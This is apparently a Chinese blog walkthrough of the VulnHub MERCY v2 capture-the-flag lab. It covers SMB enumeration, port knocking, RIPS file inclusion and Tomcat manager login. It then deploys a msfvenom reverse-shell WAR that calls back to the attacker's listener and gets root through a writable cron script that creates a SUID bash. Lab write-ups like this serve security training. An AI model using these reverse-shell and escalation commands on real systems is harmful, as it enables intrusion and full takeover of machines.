
vulnhub靶场之digitalworld.local: MERCY v2_mercy vulnhub-CSDN博客攻略https://download.vulnhub.com/digitalworld/MERCY-v2.zip靶场下载1.主机探测nmap -sn 192.168.100.0/24 arp-scan -I eth0 192.168.100.0/24 netdiscover -i eth0 -r 192.168.100.0/24 masscan 192.168.100.0/24 -p 8080探测到目标主机为192.168.100.1372.端口扫描我们可以看到好多的端口但是22端口和80端口没有开放22 53 80 110 139 143 445 993 995 80803.渗透测试访问web服务无法运作访问8080端口可以有效我们可以看到是一个默认的tomcat页面我们进行扫描扫描8080web服务目录dirb http://192.168.100.137:8080我们扫描到一个登录页面一个robots.txt访问robots.txt和manager我们进行访问是应该是base64解码后看内容是什么发现了密码password我们访问/manager/发现是一个登录页面但是我们不知道用户名和密码所以这里我们的思路就断了先把password放一放我们在扫描端口的时候扫描到了smb服务我们使用enum4linux对目标smb服务进行枚举smb服务enum4linux -a 192.168.100.137enum4linux是一个用于枚举 Windows 和 Samba 系统上信息的工具它可以帮助你发现目标系统的用户列表、组列表、共享信息以及其他一些有用的信息。这个工具特别适用于渗透测试和安全评估。重点突破qiusmbclient -NL 192.168.100.137 -N空密码匿名登录 -L列出目标 Samba 全部共享文件夹 输出证明靶机 3 个共享 列出共享文件夹根据前面2个命令我们可以看到用户名是qiu我们前面找到密码是password,用户名是qiu,我们使用smbclient查看目标文件共享smbclient -U qiu \\\\192.168.100.137\\qiu我们可以看到2个文件我们进行查看knock敲门服务在smb中输入 get config /tmp/config.txt因为在smb这个地方cat用不了kali中看到 80 22确实是被禁止使用了能看就行我们可以看到是一个敲门端口我们前面找到22端口和80端口没有开启这里我们使用knock命令开启22和80端口knock 192.168.100.137 159 27391 4 -v knock 192.168.100.137 17301 28504 9999 -v apt install knockd再次扫描发现80端口22端口都打开了访问80端口靶机敲门放行 80 后iptables 防火墙规则只信任本机内网网段192.168.100.x好像没有什么用我们进行扫描扫描80端口服务目录我们扫描到robots.txt,我们进行查看拼接发现是是ripscms,我们进行漏洞利用文件包含漏洞searchsploit rips 0.53前面8080端口提示我们看到用户名和密码我们前面扫描出来一个登录页面我们进行登录tomcat登录我们可以看到登录成功user usernamethisisasuperduperlonguser passwordheartbreakisinevitable rolesadmin-gui,manager-gui/文件上传拿shell我们在下面可以看到一个文件上传页面而且规定文件类型是war那么我们就使用msf进行msfvenom -p linux/x86/shell_reverse_tcp LHOST192.168.100.128 LPORT6666 -f war -o evil.war生成木马 ip是kali的 生成到了桌面 我直接xshell ftp中传到宿主机上 直接部署kali中监听nc -lvp 6666访问http://192.168.100.137:8080/evil/wttiifffzhfbs.jsp拿到shell权限提升使用python切换交互式shellpython -c import pty;pty.spawn(/bin/bash)这些都没有什么用前面文件包含我们可以看到2个用户名和密码我们试试第二个用户名和密码我们成功登录我们在home目录下看到一个定时任务权限是777那么我们就可以使用它进行提权我们修改内容cp /bin/bash /tmp/bash复制系统自带 bash 解释器到 /tmp 目录生成一份副本chmod 4777 /tmp/bash给这个 bash 副本设置SUID 特殊权限位这是典型 Cron 定时任务脚本权限不当提权管理员把 root 定时执行的脚本放开了普通用户写权限导致恶意代码注入利用 SUID 机制永久拿到 root 交互式 shell。